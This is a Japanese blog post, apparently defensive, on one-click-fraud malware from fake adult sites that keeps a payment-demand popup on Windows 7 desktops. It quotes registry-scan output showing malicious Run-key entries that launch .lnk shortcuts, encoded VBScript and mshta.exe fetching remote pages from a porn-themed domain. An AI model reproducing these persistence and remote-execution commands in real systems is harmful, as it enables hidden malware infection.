新年早々 ワンクリウェアウイルスを実行して感染させる方々2012

　新年早々、アダルト動画エロサイトを装ったワンクリック詐欺サイトにて自らウイルスを手動で起動しパソコンに感染させ、請求登録ポップアップ画像がデスクトップ画面からサッパリ消えない状況になっちゃってー・・・。

◆ 2011年ワンクリウェアウイルス界
　去年2011年にはワンクリウェアウイルスの感染挙動として、新たにショートカットファイル（.lnk）を投下するタイプが現れました。レジストリから不正なデータを見つけるのに「mshta」というのがキーポイントになってたんですが、ショートカットファイルを使うことでそこを表面上覆い隠して素人目でなかなか見つけ辛くなってます。

レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
 1 つのデータを確認しました [2012/01/01]

【キー1】
名前： nain(Extcute)
データ： "C:\Users\[ユーザー名]\AppData\Roaming\EBookSys\Extcute.lnk"
         └ C:\Users\[ユーザー名]\AppData\Roaming\aicon\appMgr2.exe //B //E:VBScript.Encode "C:\Users\[ユーザー名]\AppData\Roaming\Winamp\Facility827JkV.ssh"
怪しさ ⇒ 10 ポイント
更新日時 ⇒ .lnk ファイル要確認 2012/01/01

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

OS環境： Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe v111217
http://blogs.yahoo.co.jp/noooo_spam/59949792.html

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
 2 つのデータを確認しました [2012/01/01]

【キー2】
名前： SystemBoot2I1jfAsddKPYgYFTOrjYSXgEumsoxJGF
データ： C:\Users\[ユーザー名]\UserProfile\SystemBoot.lnk
         └ C:\Users\[ユーザー名]\UserProfile\htmlapp.exe h**p://teens-porn.info/reg2.php?cccid=2I1jfAsddKPYgYFTOrjYSXgEumsoxJGF
怪しさ ⇒ 0 ポイント
更新日時 ⇒ .lnk ファイル要確認 2012/01/01

【キー1】
名前： RegWrite2I1jfAsddKPYgYFTOrjYSXgEumsoxJGF
データ： C:\Users\[ユーザー名]\SoftRecovery\RegWrite.lnk
         └ C:\Windows\System32\mshta.exe h**p://teens-porn.info/set_inf2.php?cccid=2I1jfAsddKPYgYFTOrjYSXgEumsoxJGF
怪しさ ⇒ 20 ポイント
更新日時 ⇒ .lnk ファイル要確認 2012/01/01

■ ■ ■ ■ ■ ■ ■ ■ ■ ■

OS環境： Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe v111217
http://blogs.yahoo.co.jp/noooo_spam/59949792.html

■ ■ ■ ■ ■ ■ ■ ■ ■ ■